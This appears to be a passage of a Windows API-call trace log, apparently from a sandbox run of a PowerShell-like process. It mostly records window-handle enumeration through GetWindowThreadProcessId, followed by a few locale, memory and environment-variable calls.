	[0544.542] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x554
	[0544.542] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0544.543] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x528
	[0544.543] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0544.543] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0544.543] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0544.543] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x79c
	[0544.543] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0544.543] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4e0
	[0544.543] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0544.543] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x460
	[0544.544] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x460
	[0544.544] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x44c
	[0544.544] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x778
	[0544.544] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x460
	[0544.544] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x558
	[0544.544] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0544.544] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4d0
	[0544.544] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x19bc
	[0544.545] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x199c
	[0544.545] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1998
	[0544.545] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1994
	[0544.545] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1990
	[0544.545] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1984
	[0544.545] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x197c
	[0544.545] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1978
	[0544.545] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1824
	[0544.545] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1088
	[0544.546] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1908
	[0544.546] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x18cc
	[0544.546] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x18d0
	[0544.546] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1840
	[0544.546] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x10c4
	[0544.546] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x128c
	[0544.546] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x16e8
	[0544.546] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x16cc
	[0544.547] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x274
	[0544.547] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x10e0
	[0544.547] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x10cc
	[0544.547] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x10c0
	[0544.547] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x10d0
	[0544.547] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1198
	[0544.547] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1080
	[0544.547] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1074
	[0544.547] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x106c
	[0544.548] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1474
	[0544.548] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1414
	[0544.548] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xbd0
	[0544.548] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x550
	[0544.548] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xa38
	[0544.548] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x16d0
	[0544.548] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x16d4
	[0544.548] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x15bc
	[0544.549] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x15a0
	[0544.549] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x159c
	[0544.549] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1598
	[0544.549] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1594
	[0544.549] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1590
	[0544.549] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x158c
	[0544.549] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1588
	[0544.549] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1584
	[0544.549] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1580
	[0544.550] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x157c
	[0544.550] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1488
	[0544.550] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1404
	[0544.550] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x11b8
	[0544.550] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xbd4
	[0544.550] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xe0c
	[0544.550] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xd30
	[0544.550] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xe70
	[0544.551] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x13b8
	[0544.551] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xe20
	[0544.551] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xe2c
	[0544.551] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xe00
	[0544.551] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xe04
	[0544.551] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xc94
	[0544.551] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x13b0
	[0544.551] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x13ac
	[0544.551] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x13a8
	[0544.552] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1374
	[0544.552] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x132c
	[0544.552] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1328
	[0544.552] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x12d0
	[0544.552] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x12cc
	[0544.552] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x12c8
	[0544.552] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1290
	[0544.552] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1218
	[0544.553] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1214
	[0544.553] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x11ec
	[0544.553] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x11e8
	[0544.553] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x11cc
	[0544.553] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1140
	[0544.553] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xe6c
	[0544.553] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x6e8
	[0544.553] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xc6c
	[0544.554] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xf94
	[0544.554] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xffc
	[0544.554] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xf74
	[0544.554] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xf08
	[0544.554] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xf0c
	[0544.554] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xed8
	[0544.554] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xe90
	[0544.554] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xea8
	[0544.555] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xfa8
	[0544.555] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xfbc
	[0544.555] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xfb8
	[0544.555] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xfb4
	[0544.555] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xfb0
	[0544.555] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xfac
	[0544.555] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xfc0
	[0544.555] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xfd0
	[0544.555] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xf88
	[0544.556] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xf84
	[0544.556] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xf80
	[0544.556] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xde0
	[0544.556] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xddc
	[0544.556] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xdd8
	[0544.556] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xd34
	[0544.556] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xd10
	[0544.556] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xd0c
	[0544.557] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xc9c
	[0544.557] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xc74
	[0544.557] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xc1c
	[0544.557] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xc08
	[0544.557] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xabc
	[0544.557] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x24c
	[0544.557] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xbb0
	[0544.557] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xbfc
	[0544.558] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xb10
	[0544.558] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x374
	[0544.558] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x368
	[0544.558] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xb28
	[0544.558] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xae8
	[0544.558] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xb14
	[0544.558] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x95c
	[0544.558] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xa8c
	[0544.559] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x46c
	[0544.559] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xb3c
	[0544.559] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xa90
	[0544.559] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xad0
	[0544.559] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xa9c
	[0544.559] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xaa0
	[0544.559] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xb1c
	[0544.559] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x7e0
	[0544.560] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xa74
	[0544.560] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x694
	[0544.560] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xa28
	[0544.560] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x9b0
	[0544.560] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x8d8
	[0544.560] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x940
	[0544.560] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x93c
	[0544.560] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4ec
	[0544.560] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x150
	[0544.561] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x720
	[0544.561] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x3c4
	[0544.561] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x7d4
	[0544.561] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x6c8
	[0544.561] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xb54
	[0544.561] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xb54
	[0544.561] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xb5c
	[0544.561] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x838
	[0544.562] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x818
	[0544.562] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x5b8
	[0544.562] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x494
	[0544.562] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x1ec
	[0544.562] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x440
	[0544.562] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x7e8
	[0544.562] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x730
	[0544.562] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x2c8
	[0544.562] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x31c
	[0544.563] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x330
	[0544.563] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x128
	[0544.563] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x5c8
	[0544.563] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x6f8
	[0544.563] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x358
	[0544.563] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x73c
	[0544.563] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0xb0
	[0544.563] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x250
	[0544.564] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x240
	[0544.564] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x790
	[0544.564] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x61c
	[0544.564] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x568
	[0544.564] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x538
	[0544.564] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x540
	[0544.564] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x460
	[0544.564] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x79c
	[0544.564] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x4e0
	[0544.565] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x460
	[0544.565] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x24d980 | out: lpdwProcessId=0x24d980) returned 0x778
	[0544.569] WerSetFlags () returned 0x0
	[0544.577] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0545.692] CoTaskMemFree (pv=0x0) 
	[0545.693] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24dce8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24dce0 | out: pulNumLanguages=0x24dce8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24dce0) returned 1
	[0545.693] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24dce8, pwszLanguagesBuffer=0x2d2d160, pcchLanguagesBuffer=0x24dce0 | out: pulNumLanguages=0x24dce8, pwszLanguagesBuffer=0x2d2d160, pcchLanguagesBuffer=0x24dce0) returned 1
	[0545.699] CoTaskMemAlloc (cb=0x24) returned 0x4cde10
	[0545.699] GetUserDefaultLocaleName (in: lpLocaleName=0x4cde10, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0545.699] CoTaskMemFree (pv=0x4cde10) 
	[0545.722] CoTaskMemAlloc (cb=0x104) returned 0x470e70
	[0545.722] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x470e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.722] CoTaskMemFree (pv=0x470e70) 
	[0545.724] CoTaskMemAlloc (cb=0x104) returned 0x470e70
	[0545.724] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x470e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.725] CoTaskMemFree (pv=0x470e70) 
	[0545.727] CoTaskMemAlloc (cb=0x104) returned 0x470e70
	[0545.727] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x470e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.727] CoTaskMemFree (pv=0x470e70) 
